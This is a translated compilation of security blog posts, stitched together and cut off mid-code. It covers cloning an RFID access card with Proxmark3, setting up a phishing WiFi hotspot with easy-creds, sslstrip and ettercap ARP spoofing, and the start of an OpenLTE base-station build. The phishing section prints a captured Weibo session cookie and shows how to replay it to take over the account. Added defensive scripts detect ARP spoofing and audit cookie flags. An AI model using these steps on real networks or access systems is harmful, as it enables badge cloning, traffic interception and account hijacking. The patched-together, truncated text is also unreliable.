#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
|-----------------------------------------|          
|----- Dumping all blocks to file... -----|          
|-----------------------------------------|          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
proxmark3> 

At this point the card data has been exported to the binary file dumpdata.bin in the PM3 main directory:

But the PM3 cannot read or use the binary file as is; we need a script to convert it into the text-based .eml format:

proxmark3> script run dumptoemul.lua 
--- Executing: ./scripts/dumptoemul.lua, args''
Wrote an emulator-dump to the file 2CF0550B.eml

-----Finished
proxmark3> 

The dumptoemul script converts the dumpdata.bin binary into an eml-format file named after the card's UID.

Comparing the two files (cat on each) makes the difference obvious: the script has turned the unreadable binary file into plain-text hex, one 16-byte block per line.

The function of dumptoemul.lua can also be implemented in Python (bin2text.py):

#!/usr/bin/env python
# bin2text.py: convert a raw Proxmark3 Mifare dump (dumpdata.bin) into the
# .eml text format, one 16-byte block per line written as 32 hex characters.
from __future__ import print_function
import sys
import binascii

READ_BLOCKSIZE = 16  # one Mifare Classic block is 16 bytes


def main(argv):
    if len(argv) < 3:
        print('Usage:', argv[0], 'dumpdata.bin output.txt')
        sys.exit(1)

    # open() works on Python 2 and 3; the old file() builtin was removed in Python 3
    with open(argv[1], 'rb') as file_inp, open(argv[2], 'w') as file_out:
        while True:
            byte_s = file_inp.read(READ_BLOCKSIZE)
            if not byte_s:
                break
            # hexlify returns bytes on Python 3, so decode to str before writing
            hex_char_repr = binascii.hexlify(byte_s).decode('ascii')
            file_out.write(hex_char_repr)
            file_out.write('\n')


if __name__ == '__main__':
    main(sys.argv)

python bin2text.py dumpdata.bin output.txt
mv output.txt 2CF0550B.eml
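
The following Python 3 script is an added example, not part of the original article and not one of Proxmark3's own scripts. It does what bin2text.py and dumptoemul.lua do but adds the checks a practitioner would want before trusting a dump: it verifies that the file is a complete Mifare Classic 1K image (64 blocks of 16 bytes), reads the 4-byte UID and its BCC check byte from block 0 (the BCC is the XOR of the four UID bytes, so a mismatch means a corrupt or partial read), and derives the UID-based file name the way dumptoemul.lua does. The sample image it builds for itself is constructed around the UID 2CF0550B shown above and contains no real card data.

```python
#!/usr/bin/env python3
"""Convert a raw Mifare Classic 1K dump into Proxmark3 .eml text, with sanity checks.

Added example; not part of the original article or of the Proxmark3 project.
"""
from __future__ import annotations

import sys
from functools import reduce

BLOCK_SIZE = 16   # one Mifare Classic block
BLOCKS_1K = 64    # 16 sectors x 4 blocks for a Classic 1K card


def split_blocks(data: bytes) -> list[bytes]:
    """Validate the dump length and split it into 16-byte blocks."""
    if len(data) != BLOCK_SIZE * BLOCKS_1K:
        raise ValueError(
            f"expected {BLOCK_SIZE * BLOCKS_1K} bytes for a 1K dump, got {len(data)}")
    return [data[i:i + BLOCK_SIZE] for i in range(0, len(data), BLOCK_SIZE)]


def uid_and_bcc(block0: bytes) -> tuple[str, bool]:
    """Return (UID as upper-case hex, BCC valid?) for a 4-byte-UID card.

    Block 0 layout: UID[0..3], BCC, SAK, ATQA[2], manufacturer data[8].
    BCC is the XOR of the four UID bytes, so a mismatch means a damaged read.
    """
    uid = block0[:4]
    expected = reduce(lambda a, b: a ^ b, uid)
    return uid.hex().upper(), block0[4] == expected


def dump_to_eml(data: bytes) -> tuple[str, list[str]]:
    """Return (suggested file name, eml lines); each line is one block as 32 hex chars."""
    blocks = split_blocks(data)
    uid, bcc_ok = uid_and_bcc(blocks[0])
    if not bcc_ok:
        raise ValueError(f"block 0 BCC mismatch for UID {uid}; dump is probably damaged")
    return f"{uid}.eml", [b.hex() for b in blocks]


def build_sample_dump(uid_hex: str = "2CF0550B") -> bytes:
    """Constructed sample image (not real card data) using the UID shown in the article."""
    uid = bytes.fromhex(uid_hex)
    bcc = reduce(lambda a, b: a ^ b, uid)
    block0 = uid + bytes([bcc, 0x08, 0x04, 0x00]) + bytes(8)
    # sector trailer: key A, access bits (factory default FF 07 80 69), key B; keys zeroed here
    trailer = bytes(6) + bytes([0xFF, 0x07, 0x80, 0x69]) + bytes(6)
    blocks = [block0]
    for i in range(1, BLOCKS_1K):
        blocks.append(trailer if i % 4 == 3 else bytes(BLOCK_SIZE))
    return b"".join(blocks)


def main(argv: list[str]) -> int:
    if len(argv) != 2:
        print(f"usage: {argv[0]} dumpdata.bin", file=sys.stderr)
        return 1
    with open(argv[1], "rb") as f:
        name, lines = dump_to_eml(f.read())
    with open(name, "w") as out:
        out.write("\n".join(lines) + "\n")
    print(f"wrote {len(lines)} blocks to {name}")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as `python3 dump_check.py dumpdata.bin` and it writes 2CF0550B.eml (or whatever UID block 0 carries) next to the dump; a short file or a bad BCC is rejected instead of silently producing an image that hf mf eload would accept.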

Clear the block data in the PM3 emulator memory:

hf mf eclr 

Load the data exported from the card into the PM3 device:

proxmark3> hf mf eload 2CF0550B       
Loaded 64 blocks from file: 2CF0550B.eml  

Use PM3 to emulate the access card:

proxmark3> hf mf sim
 uid:N/A, numreads:0, flags:0 (0x00)           
#db# 4B UID: 2CF0550B              
proxmark3> 

At this point PM3 itself can be used to get through the access gate. The other option is to clone the data exported from the card, now in PM3's memory, onto a blank card and use the cloned card instead:

proxmark3> hf mf cload e         
Cant get block: 1

bingo

0x04 Security recommendations

At present about 80% of access-control products in China use the raw UID of an IC card, or the ID number of an ID card, directly as the access credential, with no encrypted authentication and no dedicated keys. The risk this poses is far greater than that of cracking Mifare keys: anyone with the right technical means can complete the process.

Access-control vendors and administrators: put protective measures in place and raise security awareness; avoid default keys and weak keys wherever possible; use identity authentication and verification between the card and the reader; and never use the raw IC-card UID or ID-card number directly as the access credential!

Users: keep your access card safe and avoid leaking its data.
With the rapid growth of the Internet of Things (IoT), wireless communication technology is being applied ever more widely. This article uses an access-control system only as a case study to expose some of the security risks in NFC and RFID protocols and technologies.

There are real-world cases as well: in 2010 the Beijing Yikatong transit card was reported to have a vulnerability that allowed the balance stored on the card to be changed at will; my personal guess is that this was most likely done by exploiting the PRNG weakness of Mifare cards. In 2014 a foreign security researcher found that Taiwan's EasyCard, used on its railways and buses, had the same PRNG vulnerability allowing the balance to be modified, and reported it to the EasyCard company.

0x05 Series articles

RFID Hacking: how I broke through the access gate and sneaked into FreeBuf headquarters

RFID Hacking②: PM3 getting-started guide

RFID Hacking③ ProxMark3 use case: sniffing bank QuickPass (闪付) card information


*Author: 雪碧0xroot@漏洞盒子安全团队. Reprints must be credited to FreeBuf hackers and geeks (FreeBuf.COM)

http://www.freebuf.com/articles/wireless/109151.html

[Hands-on] WiFi phishing in Kali Linux | How to create fake wifi hotspot with kali linux

0x00 Lab environment

OS: Kali 1.0 (VM)

FakeAP: easy-creds

Hardware: NETGEAR wg111 v3 RTL8187B wireless adapter (works without extra drivers in Kali)

Targets: Android and iPhone devices

0x01 Environment setup

git clone https://github.com/brav0hax/easy-creds
cd easy-creds


bash install.sh


Choose the first option: 1.  Debian/Ubuntu and derivatives

This step sets the easy-creds install directory, /opt. During installation a number of dependency packages and third-party programs are downloaded from overseas sites, so going through a proxy (翻墙) to reach them is recommended to save time.

When you see the prompt happy hunting, the installation is complete.

0x02

With the steps above easy-creds has been installed in Kali and can be started by running easy-creds in a terminal. Before that, a few software and system parameters need to be changed:

2.1 Change the etter uid/gid values & enable iptables port redirection

Kali ships with several man-in-the-middle tools, such as ettercap. Before using ettercap for the first time its default configuration file /etc/ettercap/etter.conf has to be edited (on some systems the path is /etc/etter.conf).

Set ettercap's ec_uid and ec_gid values to 0.

Also, if the system uses the iptables firewall, remove the leading # from the redir_command lines so the iptables configuration takes effect; change:

# if you use iptables:
   #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

to:

# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

2.2 Enable packet forwarding:

echo 1 >> /proc/sys/net/ipv4/ip_forward

2.3 Configure the iptables rule:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 

2.4 Run sslstrip

sslstrip -l 8080

2.5 Enable NetworkManager management & restart the network-manager service

vim /etc/NetworkManager/NetworkManager.conf

Change managed=false to managed=true.

Restart the network manager service:

service network-manager restart

0x03 Running easy-creds

In a terminal run: easy-creds
Choose the third option: FakeAP Attacks


Choose the first option: FakeAP Attack Static

Answer y to include the sidejacking attack.

Next, choose the interface that gives the WiFi network its Internet uplink: eth0

Choose the wireless interface & device: wlan0

Set the WiFi SSID: CMCC

WiFi channel: 5

mon0


n


at0


n


Set the subnet for the wireless network: 192.168.88.0/24

Set the DNS server: 8.8.8.8

Once this is done, easy-creds starts Airbase-NG, DMESG, SSLStrip, Ettercap tunnel, URL snarf, Dsniff and the other tools.

The portion in red shows the Android and iPhone targets successfully connected to the phishing WiFi, and URL snarf has captured the URLs the two devices were visiting.

0x04 Hacking for fun

4.1 The "Wall of Sheep"

driftnet is a simple, practical image-capture tool that pulls images out of network packets and can also capture and play audio; it can pick up photos posted in WeChat Moments, Weibo images and the like.

driftnet -i at0   (-i specifies the interface to listen on)

4.2 MITM man-in-the-middle attack

Ettercap uses ARP spoofing to intercept the traffic of one host, or even every host, on the same subnet, capturing Cookies and other information from the other hosts' traffic:

ettercap -i at0 -T -M arp:remote /192.168.88.1/ //  (via ARP spoofing, intercept the traffic of every host on the 192.168.88.0/24 subnet)
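
From the defender's side, the ARP spoofing that ettercap relies on leaves a visible trace: the same IP address, typically the gateway, suddenly being answered by a second MAC address. The following Python 3 script is an added detection example, not part of the original article or of ettercap; it parses ARP reply lines in the shape tcpdump prints them (an assumption about the input format) and reports every IP claimed by more than one MAC. The capture it runs on is constructed, with the subnet from this article and locally administered MAC addresses.

```python
#!/usr/bin/env python3
"""Spot ARP spoofing from observed ARP replies: one IP answered by several MACs.

Added defensive example; not part of the original article or of ettercap.
Input lines are assumed to look like tcpdump's ARP output, e.g.
"... ARP, Reply 192.168.88.1 is-at 00:11:22:33:44:55, length 28".
"""
import re
from collections import defaultdict

ARP_REPLY = re.compile(
    r"ARP, Reply (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) is-at "
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})", re.IGNORECASE)


def parse_arp_reply(line: str):
    """Return (ip, mac) from an ARP reply line, or None for any other line."""
    m = ARP_REPLY.search(line)
    if not m:
        return None
    return m.group("ip"), m.group("mac").lower()


def detect_arp_conflicts(lines, known=None):
    """Return {ip: sorted list of MACs} for every IP claimed by more than one MAC.

    `known` optionally maps IPs (e.g. the gateway) to their expected MAC, so a
    reply for such an IP from any other MAC is reported even if it is the only
    reply seen; that is the case that matters for gateway impersonation.
    """
    seen = defaultdict(set)
    for ip, mac in (known or {}).items():
        seen[ip].add(mac.lower())
    for line in lines:
        parsed = parse_arp_reply(line)
        if parsed:
            ip, mac = parsed
            seen[ip].add(mac)
    return {ip: sorted(macs) for ip, macs in seen.items() if len(macs) > 1}


# Constructed sample capture (not a real trace): the gateway 192.168.88.1 is
# answered first by its real MAC and then by a second MAC, the classic symptom
# of ARP cache poisoning; the same second MAC then also claims the client's IP.
SAMPLE_CAPTURE = [
    "11:27:50.100 ARP, Request who-has 192.168.88.1 tell 192.168.88.100, length 28",
    "11:27:50.101 ARP, Reply 192.168.88.1 is-at 02:00:00:aa:bb:01, length 28",
    "11:27:51.200 ARP, Reply 192.168.88.100 is-at 02:00:00:aa:bb:64, length 28",
    "11:27:52.300 ARP, Reply 192.168.88.1 is-at 02:00:00:de:ad:ee, length 28",
    "11:27:52.301 ARP, Reply 192.168.88.100 is-at 02:00:00:de:ad:ee, length 28",
]

GATEWAY = {"192.168.88.1": "02:00:00:aa:bb:01"}   # expected mapping, constructed


if __name__ == "__main__":
    for ip, macs in detect_arp_conflicts(SAMPLE_CAPTURE, GATEWAY).items():
        print(f"ALERT: {ip} claimed by {len(macs)} MACs: {', '.join(macs)}")
```

Feeding it live data is a matter of piping `tcpdump -l -n -i <iface> arp` into the parser; a static ARP entry for the gateway, or switch-side dynamic ARP inspection, is the corresponding prevention.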

4.3 Logging into the victim's account with the Cookie

Before the Cookie can be used, a browser extension for Cookies is needed, such as a cookie manager or cookie editor.

Here I used: Modify Headers for Google Chrome

4.3.1 The captured Weibo Cookie data:

Wed Jul 20 11:27:50 2016
TCP  192.168.88.100:50664 --> 180.149.139.248:80 | AP

GET /unread?t=1468985586846 HTTP/1.1.
Host: m.weibo.cn.
Connection: keep-alive.
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X; zh-CN) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/13F69 UCBrowser/10.9.19.815 Mobile.
Cookie: H5_INDEX=3; H5_INDEX_TITLE=0xroot; SUB=_2A256ilXJDeTxGeVK7VAY8y3KyjiIHXVWdXuBrDV6PUJbkdBeLRb1kW2Qqy_JChRgGgUi-REU1X25o5jdzQ..; SUHB=0y0p0SAr00Gj3K; _T_WM=132ca5c49dea82a69fb16ebcdaae493a; gsid_CTandWM=4um4CpOz5VMlYWGOqKlx8ewRL9U.
Accept: application/json, text/javascript, */*; q=0.01.
X-Requested-With: XMLHttpRequest.
Accept-Language: zh-cn.
Referer: http://m.weibo.cn/.
Accept-Encoding: gzip,deflate.
.

4.3.2 Clear the browser's Cookies for weibo.cn.

4.3.3 Import the Weibo Cookie

Click + in the upper right to add a Cookie:

Action=Modify 
Name=Cookie 
Value=H5_INDEX=3; H5_INDEX_TITLE=0xroot; SUB=_2A256ilXJDeTxGeVK7VAY8y3KyjiIHXVWdXuBrDV6PUJbkdBeLRb1kW2Qqy_JChRgGgUi-REU1X25o5jdzQ..; SUHB=0y0p0SAr00Gj3K; _T_WM=132ca5c49dea82a69fb16ebcdaae493a; gsid_CTandWM=4um4CpOz5VMlYWGOqKlx8ewRL9U.

4.3.4 Visit m.weibo.cn.

0x05 Packet sniffing & protocol analysis

5.1 wireshark

wireshark

5.2 tcpdump

tcpdump -i at0 -w sniffe.dump

5.3 Capturing HTTPS traffic with sslstrip

Capture accounts and passwords that would otherwise be sent over HTTPS (sslstrip does not break TLS; it rewrites https:// links in the plaintext pages it relays so the client keeps talking HTTP, which is why a site whose HSTS header the client has already seen is not affected):

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sslstrip -p -l 10000 -w log.txt
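
What defeats sslstrip and the Cookie replay in 4.3 is on the server side: an HSTS header makes the browser refuse plain HTTP for the site, and the Secure flag stops the session Cookie from ever being sent over HTTP in the first place. The following Python 3 script is an added defensive example, not part of the original article or of sslstrip: it parses a raw HTTP response head and lists which of those protections are missing. The two responses it audits are constructed (the Cookie names echo the capture in 4.3.1; the values and domain are made up), and the HSTS max-age threshold of one year is the minimum the browser preload list requires.

```python
#!/usr/bin/env python3
"""Audit an HTTP response head for the defences that blunt sslstrip and cookie capture.

Added defensive example; not part of the original article or of sslstrip.
The responses at the bottom are constructed, not captured from any real site.
"""
import re

ONE_YEAR = 31536000  # seconds; the HSTS preload list requires at least this max-age


def parse_head(raw: str) -> list:
    """Split a raw response head (status line followed by headers) into (name, value) pairs."""
    lines = raw.strip().splitlines()
    pairs = []
    for line in lines[1:]:          # lines[0] is the status line
        if not line.strip():
            break                   # a blank line ends the head
        name, _, value = line.partition(":")
        pairs.append((name.strip().lower(), value.strip()))
    return pairs


def cookie_attrs(set_cookie: str) -> tuple:
    """Return (cookie name, set of lower-cased attribute names) from a Set-Cookie value."""
    parts = [p.strip() for p in set_cookie.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:] if p}
    return name, attrs


def audit(raw: str) -> list:
    """Return a list of findings; an empty list means every check passed."""
    headers = parse_head(raw)
    findings = []

    hsts = [v for n, v in headers if n == "strict-transport-security"]
    if not hsts:
        findings.append("no Strict-Transport-Security: a client that starts on http:// "
                        "can be kept on http:// by an sslstrip-style downgrade")
    else:
        m = re.search(r"max-age=(\d+)", hsts[0])
        if not m or int(m.group(1)) < ONE_YEAR:
            findings.append("Strict-Transport-Security max-age below one year")

    for n, v in headers:
        if n != "set-cookie":
            continue
        name, attrs = cookie_attrs(v)
        if "secure" not in attrs:
            findings.append(f"cookie {name} lacks Secure: it would be sent on plain http:// "
                            "and could be sniffed and replayed")
        if "httponly" not in attrs:
            findings.append(f"cookie {name} lacks HttpOnly: readable by injected script")
    return findings


# Constructed sample responses (cookie names echo the capture above; values are made up).
WEAK_RESPONSE = """HTTP/1.1 200 OK
Content-Type: application/json
Set-Cookie: SUB=sample-session-token; Path=/; Domain=.example.net
Set-Cookie: _T_WM=sample-value; Path=/
"""

HARDENED_RESPONSE = """HTTP/1.1 200 OK
Content-Type: application/json
Strict-Transport-Security: max-age=31536000; includeSubDomains
Set-Cookie: SUB=sample-session-token; Path=/; Secure; HttpOnly; SameSite=Lax
Set-Cookie: _T_WM=sample-value; Path=/; Secure; HttpOnly; SameSite=Lax
"""

if __name__ == "__main__":
    for label, raw in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        findings = audit(raw)
        print(f"[{label}] {len(findings)} finding(s)")
        for f in findings:
            print("  -", f)
```

The weak response reproduces the situation in 4.3.1: a session Cookie with no Secure flag travels in clear text the moment the client is held on HTTP, and the hardened response is the same site with the two headers that make the capture and replay fail.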

0x06 Notes

1. easy-creds produces very large log files, so it is recommended to start easy-creds from /tmp (even if you forget to delete the easy-creds logs, /tmp is cleared automatically when the system reboots)

2. If devices connected to the phishing hotspot lose Internet access, check /proc/sys/net/ipv4/ip_forward promptly:

cat /proc/sys/net/ipv4/ip_forward

If the value is 0, run again:

echo 1 >> /proc/sys/net/ipv4/ip_forward

3. easy-creds is currently incompatible with Kali 2.0, so installing easy-creds on Kali 2.0 is not recommended.

0x07 Security recommendations

1. Do not connect to unknown WiFi networks casually, and log out promptly, which invalidates the Cookie;

2. Turn the phone's WiFi off when not in use, so it does not automatically join open public hotspots such as CMCC.


Building a 4G LTE base station with GnuRadio + BladeRF + OpenLTE, Part 1

Author: 雪碧0xroot@漏洞盒子安全实验室

0x00 Preface

Against the backdrop of large-scale mobile Internet growth, the spread of smartphones and the popularity of all kinds of Internet applications have made demand for wireless networks grow geometrically, and competition between mobile operators ever fiercer. But owing to tariff cuts and other factors, the revenue operators obtain from users is slowly shrinking, while spending on operations, maintenance and wireless network upgrades keeps rising and income grows only slowly. To keep profits growing in the long term, operators have to cut costs.

SDR (Software Defined Radio) moves as much of a base station's signal processing as possible into software; on a generic hardware platform it can implement modulation, demodulation and coding quickly. SDR offers a brand-new approach to building today's communication systems, lowering the cost of research and development and providing a faster path to implementation. (Quoted from: Comparison of LTE systems implemented on open-source SDR (基于开源SDR实现LTE系统对比))

Can SDR break the traditional operators' monopoly on the telecom industry?

Also worth noting: from the 2G GSM attack talks of several years ago to the recent 4G LTE security talks at overseas security conferences, base-station communication security has consistently drawn the attention of security enthusiasts.


Against this background, the overseas open-source project OpenLTE has become a hot topic.

OpenLTE is an open-source project implementing the 3GPP LTE specifications on Linux using the GNURadio software development kit; it mainly implements the functions of a simple 4G base station. Later in this article we share how to build and use OpenLTE.

For building a GSM base station with BladeRF, see:

GSM BTS Hacking: building a base station with BladeRF and the open-source BTS 5
GSM Hacking: building a portable GSM base station with BladeRF, a Raspberry Pi and YateBTS
Demo:

FreeBuf encyclopedia

2G networks are the second generation of cellular telephone protocols, characterised by digitised wireless communication and capable of narrowband data transfer. Common 2G protocols are GSM (frequency-division multiple access, with GPRS and EDGE) and CDMA; transfer speeds are very slow.

3G networks are the third generation of cellular telephone protocols; building on 2G they mainly added high-bandwidth data communication and improved the security of voice calls. 3G data bandwidth is generally above 500Kb/s. Three 3G standards are in common use: WCDMA, CDMA2000 and TD-SCDMA. Speeds are relatively fast and comfortably meet needs such as browsing the web on a phone.

4G networks are the fourth generation of cellular telephone protocols, with two modes, TD-LTE and FDD-LTE. They combine 3G with WLAN and can carry high-quality video and images at a quality comparable to high-definition television. A 4G system can download at 100Mbps, 2000 times faster than dial-up, and upload at up to 20Mbps, which satisfies almost every user's requirements for wireless service.

So, security aside, what is the difference between 2G, 3G and 4G? For users the biggest difference is transfer speed.

An example you will grasp instantly: on 2G you can watch Teacher Cang as a .txt, on 3G as a .jpg, on 4G as an .avi.

0x01 Environment setup

OS: Ubuntu

GnuRadio 3.7

BladeRF

HackRF

1.1 BladeRF

1.1.1 Driver

mkdir bladeRF
cd bladeRF
wget -c https://github.com/Nuand/bladeRF/archive/master.zip
unzip master.zip
cd bladeRF-master
cd host
mkdir build
cd build
cmake -DCMAKE_BUILD_TYPE=Release -DCMAKE_INSTALL_PREFIX=/usr/local -DINSTALL_UDEV_RULES=ON ../
make -j4
make install > install.log
ldconfig

1.1.2 BladeRF firmware

wget -c http://www.nuand.com/fx3/bladeRF_fw_v1.8.0.img
bladeRF-cli -f bladeRF_fw_v1.8.0.img -v verbose

1.2 GNURadio

mkdir gnuradio
cd gnuradio
wget http://www.sbrac.org/files/build-gnuradio
chmod a+x build-gnuradio
./build-gnuradio -v
sudo apt-get install libpolarssl-dev

0x02 A shortcut

The steps above require a lot of dependencies. Anyone who wants to save the effort can use the Ubuntu LiveCD published by GnuRadio, which already has gnuradio, HackRF, BladeRF, USRP, gqrx, rtl-sdr and the rest of the SDR dependencies set up; this avoids the great majority of the pitfalls met when installing the environment yourself.
Download link: http://gnuradio.org/redmine/projects/gnuradio/wiki/GNURadioLiveDVD

2.1 Compiling OpenLTE (file list)

wget http://ufpr.dl.sourceforge.net/project/openlte/openlte_v00-19-04.tgz  # (the latest version at the time of writing)
tar zxvf openlte_v00-19-04.tgz
cd openlte_v00-19-04/
mkdir build
cd build
sudo cmake ../
sudo make
sudo make install


0x03 Scanning nearby base stations

Plug in the SDR device. Here I used a BladeRF (I tested a HackRF and it works too, but because the HackRF moves samples over USB 2.0 it is far less efficient than the BladeRF; those who can should use a USRP).

osmocom_fft --samp-rate 80000000

After OpenLTE is compiled, the executables are generated under the build directory:

cd LTE_fdd_dl_scan
./LTE_fdd_dl_scan

Open a new terminal and enter OpenLTE's interactive control console over Telnet:

telnet 127.0.0.1 20000

In the telnet session run start to begin scanning.

LTE_fdd_dl_scan scans the EARFCN values in the dl_earfcn_list: from 25 to 575.

ARFCN, the Absolute Radio Frequency Channel Number, is the numbering scheme used in GSM radio systems to identify a particular RF channel; anyone who has sniffed GSM SMS will be familiar with it. In 4G LTE the ARFCN is called the EARFCN.
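
To make sense of the EARFCN values the scan reports, the following Python 3 snippet is an added example (not part of the original article or of OpenLTE) that converts a downlink EARFCN into its band and carrier frequencies using the formula from 3GPP TS 36.101: F = F_low + 0.1 MHz × (N − N_Offs). Only a handful of bands are tabled: FDD bands 1 and 3 used in the scans below, band 7, and the TD-LTE bands 38 to 41; for FDD bands the uplink EARFCN is the downlink EARFCN plus 18000, while TDD uses one EARFCN for both directions. The scan_range helper (my own, not an OpenLTE function) lists what a dl_earfcn_list such as 25..575 covers for a chosen step.

```python
#!/usr/bin/env python3
"""Map an LTE downlink EARFCN to its band and carrier frequencies (3GPP TS 36.101, 5.7.3).

Added example; not part of the original article or of OpenLTE.
F_DL = F_DL_low + 0.1 MHz * (N_DL - N_Offs_DL); F_UL is computed the same way from
the band's uplink edge. FDD: N_UL = N_DL + 18000. TDD: N_UL = N_DL.
"""
from __future__ import annotations

from dataclasses import dataclass


@dataclass(frozen=True)
class Band:
    number: int
    mode: str          # "FDD" or "TDD"
    f_dl_low: float    # MHz, lower edge of the downlink block
    n_offs_dl: int     # first downlink EARFCN of the band
    n_dl_max: int      # last downlink EARFCN of the band
    f_ul_low: float    # MHz, lower edge of the uplink block (same as f_dl_low for TDD)


# Subset of TS 36.101 Table 5.7.3-1 (values from the spec, transcribed here).
BANDS = [
    Band(1,  "FDD", 2110.0,     0,   599, 1920.0),
    Band(3,  "FDD", 1805.0,  1200,  1949, 1710.0),
    Band(7,  "FDD", 2620.0,  2750,  3449, 2500.0),
    Band(38, "TDD", 2570.0, 37750, 38249, 2570.0),
    Band(39, "TDD", 1880.0, 38250, 38649, 1880.0),
    Band(40, "TDD", 2300.0, 38650, 39649, 2300.0),
    Band(41, "TDD", 2496.0, 39650, 41589, 2496.0),
]


def band_of(earfcn: int) -> Band:
    """Find the tabled band containing a downlink EARFCN."""
    for b in BANDS:
        if b.n_offs_dl <= earfcn <= b.n_dl_max:
            return b
    raise ValueError(f"EARFCN {earfcn} is not in any tabled band")


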